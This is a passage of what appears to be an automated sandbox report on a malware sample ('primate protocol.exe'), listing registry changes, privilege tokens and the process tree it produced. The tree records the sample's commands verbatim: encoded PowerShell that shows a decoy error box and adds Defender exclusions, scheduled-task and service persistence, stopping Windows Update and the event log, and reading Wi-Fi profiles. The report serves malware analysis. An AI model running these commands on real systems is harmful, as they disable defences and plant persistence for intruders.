| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133907626609832177" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{C39E5D0C-9F5A-4087-ACFB-9AFB8511C36F} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{1B8FE61C-B4DB-4F04-8069-E6E2E8EE2AD7} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\systemprocess.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\CompPkg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\host.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\primate protocol.exe
"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\systemprocess.exe
"C:\Windows\systemprocess.exe"
C:\Windows\host.exe
"C:\Windows\host.exe"
C:\Windows\CompPkg.exe
"C:\Windows\CompPkg.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SYSTEM32\netsh.exe
"netsh" wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "PROCESS HOST"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "PROCESS HOST"
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3dc28f87-b8e3-4dfa-a166-a006b4a498ba}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ec80ab00-b363-4b21-bbe8-85111939d665}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff982dedcf8,0x7ff982dedd04,0x7ff982dedd10
C:\Program Files\Google\Chrome\Application\chrome.exe
